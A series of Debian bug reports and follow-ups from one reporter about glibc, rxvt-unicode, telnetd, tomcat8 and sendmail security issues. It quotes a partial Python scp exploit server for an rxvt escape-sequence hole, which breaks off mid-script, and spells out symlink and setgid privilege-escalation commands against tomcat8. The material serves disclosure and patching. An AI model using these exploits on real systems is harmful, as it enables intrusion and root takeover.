Bug#1041836: libc6 2.36-9+deb12u1 double free abort
I now tried the idea whether the amount of memory in the machine has a relevance to my "inetd: double free detected in tcache 2, abort" issue. I tried "mem=8G" and similar as kernel boot parameter; that produced more-or-less the expected results for memory shown by "free", but did not help to fix the issue. I may try to change physical RAM modules, not sure whether have suitable replacements. Cheers, Paul -- Paul Szabo p...@maths.usyd.edu.au www.maths.usyd.edu.au/u/psz School of Mathematics and Statistics University of SydneyAustralia
Bug#1041836: root unable to write un-owned
Bummer. This last "echo x > /tmp/x" issue is probably the result of protected_regular being set in kernel configs, see https://docs.kernel.org/admin-guide/sysctl/fs.html#id12 Sorry about the noise. (Hangs head in shame.) Cheers, Paul
Bug#1041836: root unable to write un-owned
Another oddity that should never happen: root cannot write file that he does not own. Demonstration (root running bash): root# touch /tmp/x root# ls -l /tmp/x -rw-r--r-- 1 root root 0 Aug 10 09:39 /tmp/x root# echo a > /tmp/x root# chown 2:2 /tmp/x root# ls -l /tmp/x -rw-r--r-- 1 bin bin 2 Aug 10 09:39 /tmp/x root# echo b > /tmp/x -bash: /tmp/x: Permission denied root# chown 0:0 /tmp/x root# ls -l /tmp/x -rw-r--r-- 1 root root 2 Aug 10 09:39 /tmp/x root# echo c > /tmp/x This issue seems to reproduce on all machines where I tried. Quite possibly unrelated (so I may cop some flak) ... or maybe these "impossible" happenings have a common cause? Cheers, Paul
Bug#1041836: libc6 2.36-9+deb12u1 double free abort
Dear Aurelien, I used LD_PRELOAD=libc_malloc_debug.so for MALLOC_CHECK_. With those extra checks (tried all values of MALLOC_CHECK_ from 0 to 20), glibc did not show any errors, suggesting that the bug is not in inetd. The original poster said his issue shows on some hardware only. I observed my issue on a wider range of CPUs: present on Xeon4309Y, Xeon6326 and i7-8700, but not on i7-4790, i5-4570, i5-3470, N5105 or x5-Z8350. Maybe the difference is in the RAM of the machine? Those with my issue have 16GB or more, those without have 8GB or less. Cheers, Paul
Bug#1041836: libc6 2.36-9+deb12u1 double free abort
Maybe related: seems that the default for "mcheck" or MALLOC_CHECK_ has changed. I observe an oddity. I only noticed this recently, with libc6 version 2.36-9+deb12u1; reverting to previous 2.36-9 did not seem to help. The issue. Sending SIGHUP to the inetd(8) process should cause it to re-load its configuration, but instead it elicits free(): double free detected in tcache 2 and an abort. This is easiest seen (after "systemctl stop inetd") with root# inetd -d -i & sleep 1; kill -HUP $!; sleep 1; jobs [1] 2431 ADD: ident proto=tcp4, wait.max=1.256 user:group=identd:(default) builtin=0 server=/usr/sbin/identd free(): double free detected in tcache 2 [1]+ Aborted inetd -d -i root# Sanity(?) is restored by using MALLOC_CHECK_=0 (needs LD_PRELOAD): root# LD_PRELOAD=libc_malloc_debug.so MALLOC_CHECK_=0 inetd -d -i & sleep 1; kill -HUP $!; sleep 1; jobs; kill $!; sleep 1; jobs [1] 2437 ADD: ident proto=tcp4, wait.max=1.256 user:group=identd:(default) builtin=0 server=/usr/sbin/identd REDO: ident proto=tcp4, wait.max=1.256 user:group=identd:(default) builtin=0 server=/usr/sbin/identd [1]+ Running LD_PRELOAD=libc_malloc_debug.so MALLOC_CHECK_=0 inetd -d -i & [1]+ DoneLD_PRELOAD=libc_malloc_debug.so MALLOC_CHECK_=0 inetd -d -i root# To compound the oddity, the value of MALLOC_CHECK_ or even its presence seems ignored, just the LD_PRELOAD=libc_malloc_debug.so "fixes" the issue. Hope this helps to find the cause. Cheers, Paul References: http://btorpey.github.io/blog/2019/07/14/memory-checking/ https://www.gnu.org/software/libc/manual/html_node/Heap-Consistency-Checking.html -- Paul Szabo p...@maths.usyd.edu.au www.maths.usyd.edu.au/u/psz School of Mathematics and Statistics University of SydneyAustralia Join the Union and fight for a better University: www.nteu.au/join
Bug#988763: rxvt-unicode: Remote(?) code execution via ESC G Q
Dear Ryan, I just wrote: Curious that you do not consider this a bug: similar things were fixed in other terminal emulators like xterm, so people could "safely" view (i.e. cat or grep) any files, e.g. root perusing syslog. I guess I should have given examples or references. Some that come to mind: www.debian.org/security/2003/dsa-380 www.debian.org/security/2009/dsa-1694 bugs.debian.org/511516 Anyway, I solved my problem by "apt purge rxvt-unicode" on all my machines. Cheers, Paul -- Paul Szabo p...@maths.usyd.edu.au www.maths.usyd.edu.au/u/psz School of Mathematics and Statistics University of SydneyAustralia I support NTEU members taking a stand for workplace rights in the face of poorly-run change management. Visit www.nteu.org.au/sydney to learn more.
Bug#988763: rxvt-unicode: Remote(?) code execution via ESC G Q
Dear Ryan, Curious that you do not consider this a bug: similar things were fixed in other terminal emulators like xterm, so people could "safely" view (i.e. cat or grep) any files, e.g. root perusing syslog. Looking at the further message on FullDisclosure: https://seclists.org/fulldisclosure/2021/May/51 (quoted below for completeness), it seems that this is now fixed upstream in version 9.25, maybe they did consider it a bug. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au www.maths.usyd.edu.au/u/psz School of Mathematics and Statistics University of SydneyAustralia Quoting message: From: def To: Date: Thu, 20 May 2021 04:38:34 +0300 Subject: Re: [FD] (u)rxvt terminal (+bash) remoteish code execution 0day Minor clarifications and additional details for the post. First and foremost, this vulnerability is not technically a zero-day for rxvt-unicode since the bug has been independently discovered & publicly discussed at oss-security at least in 2017: https://www.openwall.com/lists/oss-security/2017/05/01/20 Upstream patched the vulnerability silently back in 2017. According to rxvt-unicode commit messages and changelog entries, the vulnerability was considered to have minor "security implications" explaining why it never was considered critical enough to backport to old Linux distros. Moreover, the first patched version is rxvt-unicode 9.25 (2021-05-14) released barely a couple of weeks ago. Therefore, most Linux distros still ship *unpatched* rxvt-unicode 9.22 (2016-05-14). Yes, 9.23 & 9.24 version numbers do not exist because they were skipped in the upstream. Nonetheless the exploit remains 0day (i.e., no upstream patch available) for at least the following rxvt forks and derivatives. - rxvt 2.7.10 (the original rxvt terminal) - mrxvt 0.5.4 (unmaintainen rxvt teminal with tabs) - aterm 1.0.1 (random rxvt-based terminal from Debbie "jessie" repos) - eterm 0.9.7 (Enlightenmenth Finally, the vulnerability can be exploited in any context in which the attacker can plant payload scripts in a subdirectory of CWD and trigger code execution by writing (unescaped) ANSI escape sequences to stdout or stderr. Suitable target programs besides `scp` include popular CLI tools like `unrar` and `busybox tar` as demonstrated in the PoCs here: https://huumeet.info/~def/rxvt0day/ Note that GNU tar is not exploitable due to properly escaped filenames. - def
Bug#988763: rxvt-unicode: Remote(?) code execution via ESC G Q
Package: rxvt-unicode
Version: 9.22-6
Severity: grave
Tags: security upstream
Justification: user security hole
Dear Maintainer,
Please see message on Full-Disclosure mailing list:
https://seclists.org/fulldisclosure/2021/May/33
(quoted below, for completeness).
Please fix.
Thanks, Paul
Paul Szabo p...@maths.usyd.edu.au www.maths.usyd.edu.au/u/psz
School of Mathematics and Statistics University of SydneyAustralia
Quoting messasge:
From: def
To:
Date: Sun, 16 May 2021 15:32:48 +0300
Subject: [FD] (u)rxvt terminal (+bash) remoteish code execution 0day
#!/usr/bin/env python
# Title: rxvt (remote) code execution over scp with $SHELL=/bin/bash (0day)
# Version: rxvt 2.7.10, rxvt-unicode 9.22
# Author: def
# Date: 2021-05-16
# CVE: N/A
#
#--
# (U)RXVT VULNERABILITY
#
# In rxvt-based terminals, ANSI escape sequence ESC G Q (\eGQ, \033GQ, \x1bGQ)
# queries the availability of graphics and the response is received from stdin.
# However, rxvt responds to the query with a newline-terminated message, which
# is retarded and exposes goatse-wide gaping security holes in many popular CLI
# programs when executed inside an rxvt terminal window.
#
# [def@arch ~]$ printf '\eGQ'
# ^[G0
# [def@arch ~]$ 0
# bash: 0: command not found
#
# The latter command (i.e., 0) executes automatically without user interaction.
# The contents of the second command can be somewhat controlled by chaining the
# printf message with other escape sequences. In particular, a VT52 mode escape
# sequence \eZ prepends a letter Z and triggers bash's tab completion, allowing
# the construction of relative paths and, therefore, code execution in the form
# of running (planted) files from subdirectories in the current directory.
#
# URXVT (+BASH) CODE EXECUTION PROOF-OF-CONCEPT ---
#
# % mkdir -p ZZZ && echo 'uname -a; id; date; sh -i' >ZZZ/0 && chmod +x ZZZ/0
# % urxvt -e bash
#
# [def@arch ~]$ printf '\e[?2l\eZ\e<\eGQ'
# ^[/Z^[G0
# [def@arch ~]$ ZZZ/0
# Linux 5.11.1-arch-1 #1 SMP PREEMPT Tue, 23 Feb 2021 14:05:30 x86_64 GNU/Linux
# uid=1000(def) gid=1001(def) groups=1001(def),43(tor),998(wheel),999(adm)
# Sun Apr 18 04:25:22 AM EEST 2021
# sh-5.1$
#
# FIX -
#
# Don't use rxvt or any of its derivatives. Stay the fuck away from xterm also.
#
# st(1) is a viable solution if you ever plan to `cat /var/log/access.log` or
# otherwise handle untrusted data from questionable sources.
#
#--
import logging
import paramiko
import socket
import threading
logging.basicConfig(level=logging.INFO)
"""
This script implements a scp server that exploits insecure ANSI escape sequence
handling in client's (u)rxvt terminal (and bash shell). A recursive (-r) copy
into the current directory leads to code execution. For example:
$ scp -r -P user@localhost:/backup/or/whatever/ .
The above command transfers payload files ZZZ/0, ZZZ/1 and ZZZ/Z0 to the client
and executes one of them (the executed payload depends on the rxvt version).
"""
bind = ('localhost', )
payload = '#!/bin/sh\nuname -a; id; date; sh -i\n'
class ScpExploitServer(paramiko.ServerInterface):
def __init__(self):
self.event = threading.Event()
def get_allowed_auths(self, username):
return "password"
def check_auth_none(self, username):
logging.info('Authenticating as %s', username)
return paramiko.AUTH_SUCCESSFUL
def check_auth_password(self, username, password):
logging.info('Authenticating with %s:%s', username, password)
return paramiko.AUTH_SUCCESSFUL
def check_channel_request(self, kind, chanid):
logging.info('Opening %s channel %d', kind, chanid)
if kind != "session":
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
return paramiko.OPEN_SUCCEEDED
def check_channel_exec_request(self, channel, command):
chanid, command = channel.get_id(), command.decode('ascii')
logging.info('Approving channel %d exec request: %s', chanid, command)
parts = command.split()
assert len(parts) > 2 and parts[0] == 'scp' and '-f' in parts
threading.Thread(target=self.exploit, args=[channel]).start()
return True
def exploit(self, channel):
def wait(): assert channel.recv(4096) == b'\x00'
def send(): channel.sendall(b'\x00')
fdir, fname0, fname1, fname2 = 'ZZZ', '0', '1', 'Z0'
wait()
# (1) Create subdirectory './ZZZ/'
logging.info('Enter
Bug#956084: inetutils-telnetd: CVE-2020-10188
Package: inetutils-telnetd Severity: critical Tags: security Justification: root security hole Looking in https://security-tracker.debian.org/tracker/CVE-2020-10188 : utility.c in telnetd in netkit telnet through 0.17 allows remote attackers to execute arbitrary code via short writes or urgent data, because of a buffer overflow involving the netclear and nextitem functions. Seems to me that inetutils contains the same (vulnerable) utility.c functions. Please check. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au www.maths.usyd.edu.au/u/psz School of Mathematics and Statistics University of SydneyAustralia
Bug#845393: Pending fixes for bugs in the tomcat8 package
Dear Emmanuel, The two directories /etc/tomcat8/Catalina /etc/tomcat8/Catalina/localhost have similar ownership and permissions, but they are set up differently: localhost is "delivered" writable, while Catalina is delivered without but is then set so in postinst (and re-set at each upgrade). This seems confusing. Would it be worthwhile to handle them both in the same way? Maybe some other things in postinst could get the same treatment. (Simple is easier to keep secure.) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845393: Pending fixes for bugs in the tomcat8 package
Dear Emmanuel, (Yes I had tomcat6, then went to tomcat8, skipping tomcat7; and have inherited things.) You seem to say that /etc/tomcat8/Catalina/localhost does not need to be writable by tomcat8, setting it so was useless (thus wrong). What about the /etc/tomcat8/Catalina directory, is there a need to set it writable? Is there a need to have these owned by group tomcat8, could they be left as root:root and world-accessible? Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845393: Pending fixes for bugs in the tomcat8 package
Dear Emmanuel, Sorry for my previous outbursts. I was wrong. Your fix (chmod-ing just Catalina, not localhost) is fine: if you do not chmod localhost, then there is no issue even if localhost is replaced by a symlink pointing somewhere. However... will tomcat still "work"? On my machine, I have one XML file /etc/tomcat8/Catalina/localhost/mapleta.xml in there, for the one application(?) that is installed. I guess it was tomcat that put it there: then tomcat needs write access to localhost. Maybe /etc/tomcat8/Catalina/localhost is to be "delivered" writable from the DEB package, the ownership only to be fixed in postinst? In the current DEB, that directory is not group-writable. Could you kindly explain how this all works. Thanks, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845393: Pending fixes for bugs in the tomcat8 package
Hmm... I just accused you of being mistaken... but maybe it is I who is wrong. - Now thinking it through again. Cheers, Paul
Bug#845393: Pending fixes for bugs in the tomcat8 package
Dear Emmanuel, >> The bug depends on "Catalina" being writable; the permissions on >> "localhost" are irrelevant. > > The postinst script no longer runs chmod 755 on the localhost directory. > If I'm not mistaken this fixes the issue you reported. > > https://anonscm.debian.org/cgit/pkg-java/tomcat8.git/commit/?id=02570d6 > > The script still chmods the Catalina directory but this one can't be > replaced by a symlink. You are mistaken. Please re-read the original bug report. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845393: marked as done (Privilege escalation via upgrade)
reopen 845393 thanks Not done. Please fix proper. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845393: Pending fixes for bugs in the tomcat8 package
Dear Emmanuel, > No longer make /etc/tomcat8/Catalina/localhost writable ... The bug depends on "Catalina" being writable; the permissions on "localhost" are irrelevant. Please re-open. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845385: Privilege escalation via removal
Emmanuel wrote: >> Might protect against "static" things, but vulnerable to a race. > I'm not sure to understand, what kind of race could happen here? Hmm... You suggested some chmod before chown. Your attacker sits tight, waits for the chmod, then creates the "bad thing" in readiness for your chown. The chmod takes time to complete, the chown takes time to get up and start: plenty of time in between for the attacker to act. >> But really... why do you care about leaving some "dangling" useless >> object, owned by some long-gone UID or GID? > > I don't know the motivations behind this complexity. I can imagine a > case where an administrator switches from tomcat8 to tomcat9 and doesn't > expect the old package to remove files unknown to him so they can be > moved to the configuration directory of the new package. > > The upgrade scenario could look like this: > > 1. Install tomcat8 > 2. Declare a web application in /etc/tomcat8/Catalina/localhost > 3. Uninstall tomcat8 > 4. Install tomcat9 > 5. Move /etc/tomcat8/Catalina/localhost/* to /etc/tomcat9/Catalina/localhost > > If the step 3 also removes the webapp configuration the administrator is > going to be angry (but arguably less than having his system hacked). You misunderstood. Do not remove things in "step 3": leave alone, do not chown. (Remove the chown from your script.) Leave it being owned by the tomcat8 UID, not bother that the UID will be "gone" and un-named. >> Then if the tomcat8 package is removed (purged?), the postrm script runs >> chown -Rhf root:root /etc/tomcat8/ >> and that will leave the file world-writable, setgid root > > What about switching the files left to nobody:nogroup instead of > root:root? That would be less disruptive for the stable and oldstable > updates than removing /etc/tomcat8 completely. That would be less dangerous, but still wrong; would still be privilege escalation, though to a less useful entity. --- Markus wrote: >>> Then if the tomcat8 package is removed (purged?), the postrm script runs >>> chown -Rhf root:root /etc/tomcat8/ >>> and that will leave the file world-writable, setgid root >> >> What about switching the files left to nobody:nogroup instead of >> root:root? That would be less disruptive for the stable and oldstable >> updates than removing /etc/tomcat8 completely. > > I guess just removing /etc/tomcat8/Catalina would be an option too. As > far as I know nothing else requires it to be present after the removal > of Tomcat. If there were applications with such a dependency we should > take a look at them. Yes you could "forcibly" remove /etc/tomcat8/Catalina. But then, just remove all of /etc/tomcat8 so there is definitely nothing left to chown. --- I now notice a typo in your postrm script. It has lines like: if [ -d /var/lib/tomcat8/common ] && [ -z "`(find var/lib/tomcat8/common/classes -type f)`" ] ; then and are missing a "/" in front of "var". (Of course the "if" are superfluous, just do the "rmdir".) --- I now notice that the Debian bug contraption does not CC me on messages: just being the submitter does not add you to the CC list, you need to explicitly "subscribe". So I missed a number of intermediate messages. --- Markus wrote previously: > ... Besides all tomcat processes are killed on purge. Where does that happen? I do not think that is true. Neither are any possible setuid-tomcat8 or setgid-tomcat8 files removed. --- Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845385: Privilege escalation via removal
Dear Emmanuel, > Do you think running something like "chmod -R 640 /etc/tomcat8" right > before the chown is an appropriate solution to this issue? Might protect against "static" things, but vulnerable to a race. Your postrm script might want to kill all tomcat8 processes, also. That might be a "good thing": deluser or delgroup might not "work" with left-over, running processes; and might protect against a race. But really... why do you care about leaving some "dangling" useless object, owned by some long-gone UID or GID? Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845393: Privilege escalation via upgrade
Package: tomcat8 Version: 8.0.14-1+deb8u4 Severity: critical Tags: security Having installed tomcat8, the directory /etc/tomcat8/Catalina is set writable by group tomcat8, as per the postinst script. Then the tomcat8 user, in the situation envisaged in DSA-3670 and DSA-3720, see also http://seclists.org/fulldisclosure/2016/Oct/4 could use something like commands mv -i /etc/tomcat8/Catalina/localhost /etc/tomcat8/Catalina/localhost-OLD ln -s /etc/shadow /etc/tomcat8/Catalina/localhost to create a symlink: # ls -l /etc/tomcat8/Catalina/localhost lrwxrwxrwx 1 tomcat8 tomcat8 11 Nov 23 10:19 /etc/tomcat8/Catalina/localhost -> /etc/shadow Then when the tomcat8 package is upgraded (e.g. for the next DSA), the postinst script runs chmod 775 /etc/tomcat8/Catalina /etc/tomcat8/Catalina/localhost and that will make the /etc/shadow file world-readable (and group-writable). Other useful attacks might be to make the objects: /root/.Xauthority /etc/ssh/ssh_host_dsa_key world-readable; or make something (already owned by group tomcat8) group-writable (some "policy" setting maybe?). Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#845385: Privilege escalation via removal
Package: tomcat8 Version: 8.0.14-1+deb8u4 Severity: critical Tags: security Having installed tomcat8, the directory /etc/tomcat8/Catalina is set writable by group tomcat8, as per the postinst script. Then the tomcat8 user, in the situation envisaged in DSA-3670 and DSA-3720, see also http://seclists.org/fulldisclosure/2016/Oct/4 could use something like commands touch /etc/tomcat8/Catalina/attack chmod 2747 /etc/tomcat8/Catalina/attack to create a file: # ls -l /etc/tomcat8/Catalina/attack -rwxr-Srwx 1 tomcat8 tomcat8 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack Then if the tomcat8 package is removed (purged?), the postrm script runs chown -Rhf root:root /etc/tomcat8/ and that will leave the file world-writable, setgid root: # ls -l /etc/tomcat8/Catalina/attack -rwxr-Srwx 1 root root 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack allowing "group root" access to the world. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root
Dear Andreas, > I have a completely untested patch sitting in GIT - do you have a > possibility to test packages built from that? I could replace files, or DEB packages, on some test machines. Do not know whether that testing would be exhaustive: do not know how many features of the sendmail package I use. Or if the changes are "small" then could just inspect. Cheers, Paul
Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root
Hmm (again) ... Maybe file /usr/share/sendmail/sendmail needs updating also? It is almost identical to /etc/init.d/sendmail, and in file /etc/cron.daily/sendmail I notice the lines: ... #-- # Every so often, give sendmail a chance to run the MSP queues. */20 **** smmsp test -x /etc/init.d/sendmail && /usr/share/sendmail/sendmail cron-msp # #-- # Every so often, give sendmail a chance to run the MTA queues. # Will also run MSP queues if enabled #*/10 **** roottest -x /etc/init.d/sendmail && /usr/share/sendmail/sendmail cron-mta ... Maybe no problem as long as that second line is commented out. I wonder about the first line (whether it is needed), seeing how my machines always have a process like: USER PID %CPU %MEMVSZ RSS TTY STAT START TIME COMMAND smmsp 2880 0.0 0.0 11956 3236 ?Ss Oct11 0:00 sendmail: Queue runner@00:10:00 for /var/spool/mqueue-client running. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root
Hmm... you may also need to (once) do: chown smmsp /var/run/sendmail/stampdir/reload when adopting my patch. Cheers, Paul
Bug#841257: sendmail: Privilege escalation from group smmsp to (user) root
Package: sendmail
Version: 8.14.4-8+deb8u1
Severity: grave
Tags: patch security
Justification: user security hole
Supposing that due to some bug in sendmail, we were able to execute
commands as group smmsp, then that might be leveraged to cause root
to create any (empty) file.
The directory /var/run/sendmail/stampdir is group-smmsp-writable, so
we (as group smmsp) could create symlinks there pointing to any name.
Then when /etc/init.d/sendmail was run as root (to restart the daemon
maybe?), one or another of the symlinks
/var/run/sendmail/stampdir/reload
/var/run/sendmail/stampdir/cron_msp
/var/run/sendmail/stampdir/cron_mta
/var/run/sendmail/stampdir/cron_msp
might be followed to create an empty file.
Lines in /etc/init.d/sendmail:
...
110 SENDMAIL_ROOT='/var/run/sendmail';
...
144 STAMP_DIR="${SENDMAIL_ROOT}/stampdir";
...
246 touch $STAMP_DIR/reload;
...
367 touch $STAMP_DIR/reload;
...
900 touch $STAMP_DIR/cron_msp;
...
912 touch $STAMP_DIR/cron_mta;
...
938 touch $STAMP_DIR/cron_msp;
...
1130 if [ ! -d "${STAMP_DIR}" ]; then
1131 mkdir -p "${STAMP_DIR}";
1132 chown root:smmsp "${STAMP_DIR}";
1133 chmod 02775 "${STAMP_DIR}";
1134 fi;
...
Things missing to make a "convincing" exploit:
- a way to "get" group smmsp: there have not been such issues for some
years now;
- how to trick the sysadmin into restarting sendmail;
- under what conditions would any of those "touch" lines be run;
- a way to "get root" by creating some empty file: damage can be done
with /etc/nologin, maybe some exploitation with /etc/hosts.deny.
Seems this issue has low priority.
My suggested fix:
$ diff /etc/init.d/sendmail.bak <---> /etc/init.d/sendmail
246c246
< touch $STAMP_DIR/reload;
---
> su smmsp -s /bin/bash -c "touch $STAMP_DIR/reload";
367c367
< touch $STAMP_DIR/reload;
---
> su smmsp -s /bin/bash -c "touch $STAMP_DIR/reload";
900c900
< touch $STAMP_DIR/cron_msp;
---
> su smmsp -s /bin/bash -c "touch
> $STAMP_DIR/cron_msp";
912c912
< touch $STAMP_DIR/cron_mta;
---
> su smmsp -s /bin/bash -c "touch $STAMP_DIR/cron_mta";
938c938
< touch $STAMP_DIR/cron_msp;
---
> su smmsp -s /bin/bash -c "touch
> $STAMP_DIR/cron_msp";
Cheers, Paul
Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of SydneyAustralia
Bug#840685: TOCTOU race condition in initscript on chown'ing JVM_TMP temporary directory (was: Re: Bug#840685: tomcat8: DSA-3670 incomplete)
Dear Salvatore, > You are operating here outside of /tmp (sticky world-writable > directory) which the above issue for the init scripts relies on, > right? fs.protected_(hardlinks|symlinks) is exactly a hardening for > those issues: > https://www.kernel.org/doc/Documentation/sysctl/fs.txt I see: the kernel now treats things in /tmp (with sticky bit permissions) differently from other places (without "weird" permissions). Thanks for pointing this out for me! (I never noticed this change...) Then I agree that this issue is not exploitable in default Debian, no need for DSA. (Sorry about the noise.) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#840685: tomcat8: DSA-3670 incomplete
Dear Markus, Sorry to reply again. > ... But there is another rm -rf "$JVM_TMP" command in the stop target > that would remove your symlink again. I now see what you mean. There is an rm when you "stop" tomcat, and another in the "start"; so maybe there are two in restart. No matter: I watch (with inotify), keep watch and keep watching, and put in a symlink to /etc soon as I can, anytime and every time I can. So I will create a symlink after the rm during stop, a wasted thing, present between your stop and start; then during start you rm, I create the symlink, you do the useless "mkdir -p" and you chown; I win. For your test, you took the rm out of your script: you should see /etc being chowned to tomcat8. Please confirm. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#840685: tomcat8: DSA-3670 incomplete
Dear Markus, > First of all you can only gain write permissions as the tomcat8 user if > you exploit an yet unknown security vulnerability in a web application > or Tomcat itself. Debian's tomcat8 user has no shell access by default. Yes, this is a privilege escalation issue: exactly as in DSA-3670. > So the server must be running ... No, you are wrong. Once I managed run-any-code-as-tomcat8 from the running server, I set up something to run in the background, to keep running after the server exited. > ... and somehow you managed to remove /tmp/tomcat8-tomcat8-tmp and > replaced the directory with a symlink to an arbitrary file. No I do not remove anything. You do the remove, I create the symlink after you removed (and before you attempt the mkdir). > Your attack vector requires that the server must be restarted. ... Yes, exactly as in DSA-3670. > ... But there is another rm -rf "$JVM_TMP" command in the stop target > that would remove your symlink again. No, not another rm. I create the symlink after your rm. > Ok, let's imagine that you could find a way around the rm -rf commands. > Let's remove those rm -rf "$JVM_TMP" calls in /etc/init.d/tomcat8. Then > run systemctl daemon-reload. Log in as tomcat8 user and create your > symlink for /tmp/tomcat8-tomcat8-tmp. If I run systemctl restart tomcat8 > now, I get this: > > Job for tomcat8.service failed because the control process exited with > error code. > > The symlink is still present and nothing has changed regarding the file > permissions for my arbitrary file. You created the wrong symlink: not to a random place and not to a file, but a symlink to /etc (an existing directory). Please try again. > I agree that we should improve the init script in this regard but I > actually don't see a major risk like a root escalation for users at the > moment and I suggest to lower the severity of this bug report to important. Do the right test, please. You will see /etc owned by tomcat8, that effectively gives root access. >> What response time should I have expected of team@security? You had >> close to a whole day... > In my opinion it is generally understood that you should give people at > least enough time to react to an e-mail and to assess the issue. > Expecting a response time in less than a day is not very reasonable, > especially when there are things like the time difference between > Australia and Europe. You can do better, if you try. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#840685: tomcat8: DSA-3670 incomplete
Dear Salvatore, > ... if the attacher created a symlink between the rm and the mkdir > then mkdir will still fail with -p on a symlink. (Or do I miss > something?). ... Yes, you missed a simple test: $ mkdir mydir $ ln -s mydir mylink $ ls -ld my* drwx-- 2 psz amstaff 4096 Oct 14 18:46 mydir lrwxrwxrwx 1 psz amstaff5 Oct 14 18:46 mylink -> mydir $ mkdir -p mylink || echo failed $ mkdir -p mylink; echo $? 0 $ mkdir mylink || echo failed mkdir: cannot create directory `mylink': File exists failed $ mkdir mylink; echo $? mkdir: cannot create directory `mylink': File exists 1 $ ls -ld my* drwx-- 2 psz amstaff 4096 Oct 14 18:46 mydir lrwxrwxrwx 1 psz amstaff5 Oct 14 18:46 mylink -> mydir $ showing that "mkdir -p" does not fail (but plain mkdir does). > On the practicality for Debian systems though this is mitigated by the > Kernel hardenings which are enabled by default: > > fs.protected_hardlinks=1 > fs.protected_symlink=1 > > which will prevent that the target of the symlink in /tmp will be > changed on the chown call. Another missing test (besides: who is changing anything?): # grep . /proc/sys/fs/prot* /proc/sys/fs/protected_hardlinks:1 /proc/sys/fs/protected_symlinks:1 # cd ~psz # ls -ld my* drwx-- 2 psz amstaff 4096 Oct 14 18:46 mydir lrwxrwxrwx 1 psz amstaff5 Oct 14 18:46 mylink -> mydir # chown mike mylink # ls -ld my* drwx-- 2 mike amstaff 4096 Oct 14 18:46 mydir lrwxrwxrwx 1 psz amstaff5 Oct 14 18:46 mylink -> mydir # > So while I think it should be fixed, this would not warrant a DSA, > since mitigated by default in Debian. No mitigation: fix and DSA, please! --- What response time should I have expected of team@security? You had close to a whole day... compared to that, Markus replied within the hour to the Debian bug. (But he did not yet reply to my next, private bug/message... seems public messaging works best!) Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#840685: tomcat8: DSA-3670 incomplete
Dear Markus, >> [ I contacted t...@security.debian.org about this, but no response ... ] > ... Please send them to the security team > first and not to a public mailing list. I did. They did not reply within what seemed a reasonable timeframe. >> Recently DSA-3670 was released, and /etc/init.d/tomcat8 modified so... > No, we did not modify this part in /etc/init.d/tomcat8. ... Whoops, sorry, you are right. Now checking, I do not see how I got confused. This is a separate, maybe new issue. > ... more information and a working proof > of concept code are appreciated. ... Maybe the security team will understand (recognize, accept) the issue without a PoC. If they reply with such a need, then I will write one. You or they might accept the suggested patch/fix: mkdir without -p, chown with -h. Cheers, Paul Paul Szabo p...@maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia
Bug#840685: tomcat8: DSA-3670 incomplete
Package: tomcat8
Version: 8.0.14-1+deb8u3
Severity: critical
Tags: security
Justification: root security hole
[ I contacted t...@security.debian.org about this, but no response ... ]
Recently DSA-3670 was released, and /etc/init.d/tomcat8 modified so:
...
NAME=tomcat8
...
JVM_TMP=/tmp/tomcat8-$NAME-tmp
...
# Remove / recreate JVM_TMP directory
rm -rf "$JVM_TMP"
mkdir -p "$JVM_TMP" || {
log_failure_msg "could not create JVM temporary
directory"
exit 1
}
chown $TOMCAT8_USER "$JVM_TMP"
...
That suffers from a TOCTOU race condition.
An attacker can, after the "rm -rf", create a symlink to /etc. Then
"mkdir -p" returns success (though does nothing); and chown follows
the symlink. That is "game over": ability to replace /etc/passwd.
The attacker can use inotify and act quickly, and have a good chance
of winning the race to create the symlink before the init.d script
starts a new mkdir process.
Do you need some working PoC code?
---
